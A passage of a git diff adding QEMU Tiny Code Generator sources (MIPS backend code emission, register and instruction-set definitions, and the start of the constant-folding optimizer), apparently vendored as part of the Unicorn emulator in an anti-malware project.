INDEX_op_mulsh_i32: + i1 = OPC_MULT, i2 = OPC_MFHI; + goto do_hilo1; + case INDEX_op_muluh_i32: + i1 = OPC_MULTU, i2 = OPC_MFHI; + goto do_hilo1; + case INDEX_op_div_i32: + i1 = OPC_DIV, i2 = OPC_MFLO; + goto do_hilo1; + case INDEX_op_divu_i32: + i1 = OPC_DIVU, i2 = OPC_MFLO; + goto do_hilo1; + case INDEX_op_rem_i32: + i1 = OPC_DIV, i2 = OPC_MFHI; + goto do_hilo1; + case INDEX_op_remu_i32: + i1 = OPC_DIVU, i2 = OPC_MFHI; + do_hilo1: + tcg_out_opc_reg(s, i1, 0, a1, a2); + tcg_out_opc_reg(s, i2, a0, 0, 0); + break; + + case INDEX_op_muls2_i32: + i1 = OPC_MULT; + goto do_hilo2; + case INDEX_op_mulu2_i32: + i1 = OPC_MULTU; + do_hilo2: + tcg_out_opc_reg(s, i1, 0, a2, args[3]); + tcg_out_opc_reg(s, OPC_MFLO, a0, 0, 0); + tcg_out_opc_reg(s, OPC_MFHI, a1, 0, 0); + break; + + case INDEX_op_not_i32: + i1 = OPC_NOR; + goto do_unary; + case INDEX_op_bswap16_i32: + i1 = OPC_WSBH; + goto do_unary; + case INDEX_op_ext8s_i32: + i1 = OPC_SEB; + goto do_unary; + case INDEX_op_ext16s_i32: + i1 = OPC_SEH; + do_unary: + tcg_out_opc_reg(s, i1, a0, TCG_REG_ZERO, a1); + break; + + case INDEX_op_sar_i32: + i1 = OPC_SRAV, i2 = OPC_SRA; + goto do_shift; + case INDEX_op_shl_i32: + i1 = OPC_SLLV, i2 = OPC_SLL; + goto do_shift; + case INDEX_op_shr_i32: + i1 = OPC_SRLV, i2 = OPC_SRL; + goto do_shift; + case INDEX_op_rotr_i32: + i1 = OPC_ROTRV, i2 = OPC_ROTR; + do_shift: + if (c2) { + tcg_out_opc_sa(s, i2, a0, a1, a2); + } else { + tcg_out_opc_reg(s, i1, a0, a2, a1); + } + break; + case INDEX_op_rotl_i32: + if (c2) { + tcg_out_opc_sa(s, OPC_ROTR, a0, a1, 32 - a2); + } else { + tcg_out_opc_reg(s, OPC_SUBU, TCG_TMP0, TCG_REG_ZERO, a2); + tcg_out_opc_reg(s, OPC_ROTRV, a0, TCG_TMP0, a1); + } + break; + + case INDEX_op_bswap32_i32: + tcg_out_opc_reg(s, OPC_WSBH, a0, 0, a1); + tcg_out_opc_sa(s, OPC_ROTR, a0, a0, 16); + break; + + case INDEX_op_deposit_i32: + tcg_out_opc_bf(s, OPC_INS, a0, a2, args[3] + args[4] - 1, args[3]); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, a2, a0, a1, args[3]); + break; + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], args[5]); + break; + + case INDEX_op_movcond_i32: + tcg_out_movcond(s, args[5], a0, a1, a2, args[3]); + break; + + case INDEX_op_setcond_i32: + tcg_out_setcond(s, args[3], a0, a1, a2); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, true); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, false); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, true); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], + const_args[4], const_args[5], false); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], + const_args[4], const_args[5], true); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef mips_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_mul_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_muls2_i32, { "r", "r", "rZ", "rZ" } }, + { INDEX_op_mulu2_i32, { "r", "r", "rZ", "rZ" } }, + { INDEX_op_mulsh_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_muluh_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_div_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_divu_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_rem_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_remu_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_sub_i32, { "r", "rZ", "rN" } }, + + { INDEX_op_and_i32, { "r", "rZ", "rIK" } }, + { INDEX_op_nor_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_not_i32, { "r", "rZ" } }, + { INDEX_op_or_i32, { "r", "rZ", "rIZ" } }, + { INDEX_op_xor_i32, { "r", "rZ", "rIZ" } }, + + { INDEX_op_shl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_sar_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i32, { "r", "rZ", "ri" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_ext8s_i32, { "r", "rZ" } }, + { INDEX_op_ext16s_i32, { "r", "rZ" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rZ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rZ", "rZ", "0" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_setcond2_i32, { "r", "rZ", "rZ", "rZ", "rZ" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rN", "rN" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", "rZ", "rN", "rN" } }, + { INDEX_op_brcond2_i32, { "rZ", "rZ", "rZ", "rZ" } }, + +#if TARGET_LONG_BITS == 32 + { INDEX_op_qemu_ld_i32, { "L", "lZ" } }, + { INDEX_op_qemu_st_i32, { "SZ", "SZ" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "lZ" } }, + { INDEX_op_qemu_st_i64, { "SZ", "SZ", "SZ" } }, +#else + { INDEX_op_qemu_ld_i32, { "L", "lZ", "lZ" } }, + { INDEX_op_qemu_st_i32, { "SZ", "SZ", "SZ" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "lZ", "lZ" } }, + { INDEX_op_qemu_st_i64, { "SZ", "SZ", "SZ", "SZ" } }, +#endif + { -1 }, +}; + +static int tcg_target_callee_save_regs[] = { + TCG_REG_S0, /* used for the global env (TCG_AREG0) */ + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_S8, + TCG_REG_RA, /* should be last for ABI compliance */ +}; + +/* The Linux kernel doesn't provide any information about the available + instruction set. Probe it using a signal handler. */ + +#include + +#ifndef use_movnz_instructions +bool use_movnz_instructions = false; +#endif + +#ifndef use_mips32_instructions +bool use_mips32_instructions = false; +#endif + +#ifndef use_mips32r2_instructions +bool use_mips32r2_instructions = false; +#endif + +static volatile sig_atomic_t got_sigill; + +static void sigill_handler(int signo, siginfo_t *si, void *data) +{ + /* Skip the faulty instruction */ + ucontext_t *uc = (ucontext_t *)data; + uc->uc_mcontext.pc += 4; + + got_sigill = 1; +} + +static void tcg_target_detect_isa(void) +{ + struct sigaction sa_old, sa_new; + + memset(&sa_new, 0, sizeof(sa_new)); + sa_new.sa_flags = SA_SIGINFO; + sa_new.sa_sigaction = sigill_handler; + sigaction(SIGILL, &sa_new, &sa_old); + + /* Probe for movn/movz, necessary to implement movcond. */ +#ifndef use_movnz_instructions + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32\n" + "movn $zero, $zero, $zero\n" + "movz $zero, $zero, $zero\n" + ".set pop\n" + : : : ); + use_movnz_instructions = !got_sigill; +#endif + + /* Probe for MIPS32 instructions. As no subsetting is allowed + by the specification, it is only necessary to probe for one + of the instructions. */ +#ifndef use_mips32_instructions + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32\n" + "mul $zero, $zero\n" + ".set pop\n" + : : : ); + use_mips32_instructions = !got_sigill; +#endif + + /* Probe for MIPS32r2 instructions if MIPS32 instructions are + available. As no subsetting is allowed by the specification, + it is only necessary to probe for one of the instructions. */ +#ifndef use_mips32r2_instructions + if (use_mips32_instructions) { + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32r2\n" + "seb $zero, $zero\n" + ".set pop\n" + : : : ); + use_mips32r2_instructions = !got_sigill; + } +#endif + + sigaction(SIGILL, &sa_old, NULL); +} + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int i, frame_size; + + /* reserve some stack space, also for TCG temps. */ + frame_size = ARRAY_SIZE(tcg_target_callee_save_regs) * 4 + + TCG_STATIC_CALL_ARGS_SIZE + + CPU_TEMP_BUF_NLONGS * sizeof(long); + frame_size = (frame_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + tcg_set_frame(s, TCG_REG_SP, ARRAY_SIZE(tcg_target_callee_save_regs) * 4 + + TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* TB prologue */ + tcg_out_addi(s, TCG_REG_SP, -frame_size); + for(i = 0 ; i < ARRAY_SIZE(tcg_target_callee_save_regs) ; i++) { + tcg_out_st(s, TCG_TYPE_I32, tcg_target_callee_save_regs[i], + TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE + i * 4); + } + + /* Call generated code */ + tcg_out_opc_reg(s, OPC_JR, 0, tcg_target_call_iarg_regs[1], 0); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tb_ret_addr = s->code_ptr; + + /* TB epilogue */ + for(i = 0 ; i < ARRAY_SIZE(tcg_target_callee_save_regs) ; i++) { + tcg_out_ld(s, TCG_TYPE_I32, tcg_target_callee_save_regs[i], + TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE + i * 4); + } + + tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); + tcg_out_addi(s, TCG_REG_SP, frame_size); +} + +static void tcg_target_init(TCGContext *s) +{ + tcg_target_detect_isa(); + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I32], 0xffffffff); + tcg_regset_set(s->tcg_target_call_clobber_regs, + (1 << TCG_REG_V0) | + (1 << TCG_REG_V1) | + (1 << TCG_REG_A0) | + (1 << TCG_REG_A1) | + (1 << TCG_REG_A2) | + (1 << TCG_REG_A3) | + (1 << TCG_REG_T0) | + (1 << TCG_REG_T1) | + (1 << TCG_REG_T2) | + (1 << TCG_REG_T3) | + (1 << TCG_REG_T4) | + (1 << TCG_REG_T5) | + (1 << TCG_REG_T6) | + (1 << TCG_REG_T7) | + (1 << TCG_REG_T8) | + (1 << TCG_REG_T9)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); /* zero register */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_K0); /* kernel use only */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_K1); /* kernel use only */ + tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_TMP1); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); /* global pointer */ + + tcg_add_target_add_op_defs(s, mips_op_defs); +} + +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + uint32_t *ptr = (uint32_t *)jmp_addr; + *ptr = deposit32(*ptr, 0, 26, addr >> 2); + flush_icache_range(jmp_addr, jmp_addr + 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h new file mode 100644 index 0000000..c88a1c9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h @@ -0,0 +1,137 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008-2009 Arnaud Patard + * Copyright (c) 2009 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_MIPS +#define TCG_TARGET_MIPS 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#define TCG_TARGET_NB_REGS 32 + +typedef enum { + TCG_REG_ZERO = 0, + TCG_REG_AT, + TCG_REG_V0, + TCG_REG_V1, + TCG_REG_A0, + TCG_REG_A1, + TCG_REG_A2, + TCG_REG_A3, + TCG_REG_T0, + TCG_REG_T1, + TCG_REG_T2, + TCG_REG_T3, + TCG_REG_T4, + TCG_REG_T5, + TCG_REG_T6, + TCG_REG_T7, + TCG_REG_S0, + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_T8, + TCG_REG_T9, + TCG_REG_K0, + TCG_REG_K1, + TCG_REG_GP, + TCG_REG_SP, + TCG_REG_S8, + TCG_REG_RA, + + TCG_REG_CALL_STACK = TCG_REG_SP, + TCG_AREG0 = TCG_REG_S0, +} TCGReg; + +/* used for function call generation */ +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET 16 +#define TCG_TARGET_CALL_ALIGN_ARGS 1 + +/* MOVN/MOVZ instructions detection */ +#if (defined(__mips_isa_rev) && (__mips_isa_rev >= 1)) || \ + defined(_MIPS_ARCH_LOONGSON2E) || defined(_MIPS_ARCH_LOONGSON2F) || \ + defined(_MIPS_ARCH_MIPS4) +#define use_movnz_instructions 1 +#else +extern bool use_movnz_instructions; +#endif + +/* MIPS32 instruction set detection */ +#if defined(__mips_isa_rev) && (__mips_isa_rev >= 1) +#define use_mips32_instructions 1 +#else +extern bool use_mips32_instructions; +#endif + +/* MIPS32R2 instruction set detection */ +#if defined(__mips_isa_rev) && (__mips_isa_rev >= 2) +#define use_mips32r2_instructions 1 +#else +extern bool use_mips32r2_instructions; +#endif + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_andc_i32 0 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 1 +#define TCG_TARGET_HAS_mulsh_i32 1 + +/* optional instructions detected at runtime */ +#define TCG_TARGET_HAS_movcond_i32 use_movnz_instructions +#define TCG_TARGET_HAS_bswap16_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_bswap32_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_deposit_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_ext8s_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_ext16s_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_rot_i32 use_mips32r2_instructions + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_neg_i32 0 /* sub rd, zero, rt */ +#define TCG_TARGET_HAS_ext8u_i32 0 /* andi rt, rs, 0xff */ +#define TCG_TARGET_HAS_ext16u_i32 0 /* andi rt, rs, 0xffff */ + +#ifdef __OpenBSD__ +#include +#else +#include +#endif + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + cacheflush ((void *)start, stop-start, ICACHE); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c new file mode 100644 index 0000000..8693ebf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c @@ -0,0 +1,1405 @@ +/* + * Optimizations for Tiny Code Generator for QEMU + * + * Copyright (c) 2010 Samsung Electronics. + * Contributed by Kirill Batuzov + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "config.h" + +#include +#include + +#include "qemu-common.h" +#include "tcg-op.h" + +#define CASE_OP_32_64(x) \ + glue(glue(case INDEX_op_, x), _i32): \ + glue(glue(case INDEX_op_, x), _i64) + +/* Reset TEMP's state to TCG_TEMP_UNDEF. If TEMP only had one copy, remove + the copy flag from the left temp. */ +static void reset_temp(TCGContext *s, TCGArg temp) +{ + struct tcg_temp_info *temps = s->temps2; + + if (temps[temp].state == TCG_TEMP_COPY) { + if (temps[temp].prev_copy == temps[temp].next_copy) { + temps[temps[temp].next_copy].state = TCG_TEMP_UNDEF; + } else { + temps[temps[temp].next_copy].prev_copy = temps[temp].prev_copy; + temps[temps[temp].prev_copy].next_copy = temps[temp].next_copy; + } + } + temps[temp].state = TCG_TEMP_UNDEF; + temps[temp].mask = -1; +} + +/* Reset all temporaries, given that there are NB_TEMPS of them. */ +static void reset_all_temps(TCGContext *s, int nb_temps) +{ + struct tcg_temp_info *temps = s->temps2; + int i; + + for (i = 0; i < nb_temps; i++) { + temps[i].state = TCG_TEMP_UNDEF; + temps[i].mask = -1; + } +} + +static int op_bits(TCGContext *s, TCGOpcode op) +{ + const TCGOpDef *def = &s->tcg_op_defs[op]; + return def->flags & TCG_OPF_64BIT ? 64 : 32; +} + +static TCGOpcode op_to_mov(TCGContext *s, TCGOpcode op) +{ + switch (op_bits(s, op)) { + case 32: + return INDEX_op_mov_i32; + case 64: + return INDEX_op_mov_i64; + default: + fprintf(stderr, "op_to_mov: unexpected return value of " + "function op_bits.\n"); + tcg_abort(); + } +} + +static TCGOpcode op_to_movi(TCGContext *s, TCGOpcode op) +{ + switch (op_bits(s, op)) { + case 32: + return INDEX_op_movi_i32; + case 64: + return INDEX_op_movi_i64; + default: + fprintf(stderr, "op_to_movi: unexpected return value of " + "function op_bits.\n"); + tcg_abort(); + } +} + +static TCGArg find_better_copy(TCGContext *s, TCGArg temp) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg i; + + /* If this is already a global, we can't do better. */ + if (temp < (unsigned int)s->nb_globals) { + return temp; + } + + /* Search for a global first. */ + for (i = temps[temp].next_copy ; i != temp ; i = temps[i].next_copy) { + if (i < (unsigned int)s->nb_globals) { + return i; + } + } + + /* If it is a temp, search for a temp local. */ + if (!s->temps[temp].temp_local) { + for (i = temps[temp].next_copy ; i != temp ; i = temps[i].next_copy) { + if (s->temps[i].temp_local) { + return i; + } + } + } + + /* Failure to find a better representation, return the same temp. */ + return temp; +} + +static bool temps_are_copies(TCGContext *s, TCGArg arg1, TCGArg arg2) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg i; + + if (arg1 == arg2) { + return true; + } + + if (temps[arg1].state != TCG_TEMP_COPY + || temps[arg2].state != TCG_TEMP_COPY) { + return false; + } + + for (i = temps[arg1].next_copy ; i != arg1 ; i = temps[i].next_copy) { + if (i == arg2) { + return true; + } + } + + return false; +} + +static void tcg_opt_gen_mov(TCGContext *s, int op_index, TCGArg *gen_args, + TCGOpcode old_op, TCGArg dst, TCGArg src) +{ + struct tcg_temp_info *temps = s->temps2; + TCGOpcode new_op = op_to_mov(s, old_op); + tcg_target_ulong mask; + + s->gen_opc_buf[op_index] = new_op; + + reset_temp(s, dst); + mask = temps[src].mask; + if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { + /* High bits of the destination are now garbage. */ + mask |= ~0xffffffffull; + } + temps[dst].mask = mask; + + assert(temps[src].state != TCG_TEMP_CONST); + + if (s->temps[src].type == s->temps[dst].type) { + if (temps[src].state != TCG_TEMP_COPY) { + temps[src].state = TCG_TEMP_COPY; + temps[src].next_copy = src; + temps[src].prev_copy = src; + } + temps[dst].state = TCG_TEMP_COPY; + temps[dst].next_copy = temps[src].next_copy; + temps[dst].prev_copy = src; + temps[temps[dst].next_copy].prev_copy = dst; + temps[src].next_copy = dst; + } + + gen_args[0] = dst; + gen_args[1] = src; +} + +static void tcg_opt_gen_movi(TCGContext *s, int op_index, TCGArg *gen_args, + TCGOpcode old_op, TCGArg dst, TCGArg val) +{ + struct tcg_temp_info *temps = s->temps2; + TCGOpcode new_op = op_to_movi(s, old_op); + tcg_target_ulong mask; + + s->gen_opc_buf[op_index] = new_op; + + reset_temp(s, dst); + temps[dst].state = TCG_TEMP_CONST; + temps[dst].val = val; + mask = val; + if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { + /* High bits of the destination are now garbage. */ + mask |= ~0xffffffffull; + } + temps[dst].mask = mask; + + gen_args[0] = dst; + gen_args[1] = val; +} + +static TCGArg do_constant_folding_2(TCGOpcode op, TCGArg x, TCGArg y) +{ + uint64_t l64, h64; + + switch (op) { + CASE_OP_32_64(add): + return x + y; + + CASE_OP_32_64(sub): + return x - y; + + CASE_OP_32_64(mul): + return x * y; + + CASE_OP_32_64(and): + return x & y; + + CASE_OP_32_64(or): + return x | y; + + CASE_OP_32_64(xor): + return x ^ y; + + case INDEX_op_shl_i32: + return (uint32_t)x << (y & 31); + + case INDEX_op_shl_i64: + return (uint64_t)x << (y & 63); + + case INDEX_op_shr_i32: + return (uint32_t)x >> (y & 31); + + case INDEX_op_trunc_shr_i32: + case INDEX_op_shr_i64: + return (uint64_t)x >> (y & 63); + + case INDEX_op_sar_i32: + return (int32_t)x >> (y & 31); + + case INDEX_op_sar_i64: + return (int64_t)x >> (y & 63); + + case INDEX_op_rotr_i32: + return ror32(x, y & 31); + + case INDEX_op_rotr_i64: + return (TCGArg)ror64(x, y & 63); + + case INDEX_op_rotl_i32: + return rol32(x, y & 31); + + case INDEX_op_rotl_i64: + return (TCGArg)rol64(x, y & 63); + + CASE_OP_32_64(not): + return ~x; + + CASE_OP_32_64(neg): + return 0-x; + + CASE_OP_32_64(andc): + return x & ~y; + + CASE_OP_32_64(orc): + return x | ~y; + + CASE_OP_32_64(eqv): + return ~(x ^ y); + + CASE_OP_32_64(nand): + return ~(x & y); + + CASE_OP_32_64(nor): + return ~(x | y); + + CASE_OP_32_64(ext8s): + return (int8_t)x; + + CASE_OP_32_64(ext16s): + return (int16_t)x; + + CASE_OP_32_64(ext8u): + return (uint8_t)x; + + CASE_OP_32_64(ext16u): + return (uint16_t)x; + + case INDEX_op_ext32s_i64: + return (int32_t)x; + + case INDEX_op_ext32u_i64: + return (uint32_t)x; + + case INDEX_op_muluh_i32: + return ((uint64_t)(uint32_t)x * (uint32_t)y) >> 32; + case INDEX_op_mulsh_i32: + return ((int64_t)(int32_t)x * (int32_t)y) >> 32; + + case INDEX_op_muluh_i64: + mulu64(&l64, &h64, x, y); + return (TCGArg)h64; + case INDEX_op_mulsh_i64: + muls64(&l64, &h64, x, y); + return (TCGArg)h64; + + case INDEX_op_div_i32: + /* Avoid crashing on divide by zero, otherwise undefined. */ + return (int32_t)x / ((int32_t)y ? (int32_t)y : 1); + case INDEX_op_divu_i32: + return (uint32_t)x / ((uint32_t)y ? (uint32_t)y : 1); + case INDEX_op_div_i64: + return (int64_t)x / ((int64_t)y ? (int64_t)y : 1); + case INDEX_op_divu_i64: + return (uint64_t)x / ((uint64_t)y ? (uint64_t)y : 1); + + case INDEX_op_rem_i32: + return (int32_t)x % ((int32_t)y ? (int32_t)y : 1); + case INDEX_op_remu_i32: + return (uint32_t)x % ((uint32_t)y ? (uint32_t)y : 1); + case INDEX_op_rem_i64: + return (int64_t)x % ((int64_t)y ? (int64_t)y : 1); + case INDEX_op_remu_i64: + return (uint64_t)x % ((uint64_t)y ? (uint64_t)y : 1); + + default: + fprintf(stderr, + "Unrecognized operation %d in do_constant_folding.\n", op); + tcg_abort(); + } +} + +static TCGArg do_constant_folding(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y) +{ + TCGArg res = do_constant_folding_2(op, x, y); + if (op_bits(s, op) == 32) { + res &= 0xffffffff; + } + return res; +} + +static bool do_constant_folding_cond_32(uint32_t x, uint32_t y, TCGCond c) +{ + switch (c) { + case TCG_COND_EQ: + return x == y; + case TCG_COND_NE: + return x != y; + case TCG_COND_LT: + return (int32_t)x < (int32_t)y; + case TCG_COND_GE: + return (int32_t)x >= (int32_t)y; + case TCG_COND_LE: + return (int32_t)x <= (int32_t)y; + case TCG_COND_GT: + return (int32_t)x > (int32_t)y; + case TCG_COND_LTU: + return x < y; + case TCG_COND_GEU: + return x >= y; + case TCG_COND_LEU: + return x <= y; + case TCG_COND_GTU: + return x > y; + default: + tcg_abort(); + } +} + +static bool do_constant_folding_cond_64(uint64_t x, uint64_t y, TCGCond c) +{ + switch (c) { + case TCG_COND_EQ: + return x == y; + case TCG_COND_NE: + return x != y; + case TCG_COND_LT: + return (int64_t)x < (int64_t)y; + case TCG_COND_GE: + return (int64_t)x >= (int64_t)y; + case TCG_COND_LE: + return (int64_t)x <= (int64_t)y; + case TCG_COND_GT: + return (int64_t)x > (int64_t)y; + case TCG_COND_LTU: + return x < y; + case TCG_COND_GEU: + return x >= y; + case TCG_COND_LEU: + return x <= y; + case TCG_COND_GTU: + return x > y; + default: + tcg_abort(); + } +} + +static bool do_constant_folding_cond_eq(TCGCond c) +{ + switch (c) { + case TCG_COND_GT: + case TCG_COND_LTU: + case TCG_COND_LT: + case TCG_COND_GTU: + case TCG_COND_NE: + return 0; + case TCG_COND_GE: + case TCG_COND_GEU: + case TCG_COND_LE: + case TCG_COND_LEU: + case TCG_COND_EQ: + return 1; + default: + tcg_abort(); + } +} + +/* Return 2 if the condition can't be simplified, and the result + of the condition (0 or 1) if it can */ +static TCGArg do_constant_folding_cond(TCGContext *s, TCGOpcode op, TCGArg x, + TCGArg y, TCGCond c) +{ + struct tcg_temp_info *temps = s->temps2; + + if (temps[x].state == TCG_TEMP_CONST && temps[y].state == TCG_TEMP_CONST) { + switch (op_bits(s, op)) { + case 32: + return do_constant_folding_cond_32(temps[x].val, temps[y].val, c); + case 64: + return do_constant_folding_cond_64(temps[x].val, temps[y].val, c); + default: + tcg_abort(); + } + } else if (temps_are_copies(s, x, y)) { + return do_constant_folding_cond_eq(c); + } else if (temps[y].state == TCG_TEMP_CONST && temps[y].val == 0) { + switch (c) { + case TCG_COND_LTU: + return 0; + case TCG_COND_GEU: + return 1; + default: + return 2; + } + } else { + return 2; + } +} + +/* Return 2 if the condition can't be simplified, and the result + of the condition (0 or 1) if it can */ +static TCGArg do_constant_folding_cond2(TCGContext *s, TCGArg *p1, TCGArg *p2, TCGCond c) +{ + struct tcg_temp_info *temps = s->temps2; + + TCGArg al = p1[0], ah = p1[1]; 